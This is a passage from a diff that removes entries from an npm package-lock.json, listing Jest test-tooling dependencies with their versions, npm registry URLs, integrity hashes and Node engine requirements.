"semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.9", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.9.tgz", - "integrity": "sha512-2xfmOrRkGogbTK9R6Leda0DGiXeY3p2NJpy4+gNCffdUvV6mdEJnaDEic1i3Ec2djAo8jWYoJMR5PB0MSMpxUA==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.1", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.1.tgz", - "integrity": "sha512-nBpuuYuY5jFsli/JIs1oldw6fOQCBioohqWZg/2hiaOybXOft4lonv85uDOKXdf8rhyK159cxU5cDcK/NKk8zw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.9.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": 